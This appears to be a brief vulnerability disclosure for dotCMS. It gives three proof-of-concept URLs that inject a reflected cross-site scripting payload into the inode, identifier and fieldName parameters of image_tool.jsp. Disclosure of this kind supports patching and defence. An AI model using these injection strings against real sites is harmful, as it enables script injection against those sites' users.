dotCMS XSS

  • XSS in html/js/dotcms/dijit/image/image_tool.jsp

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=aaaaaaa%22;alert(1);//

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=&identifier=aaaaaaa%22;alert(1);//&fieldName=

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=&identifier=&fieldName=aaaaaaa%22;alert(1);//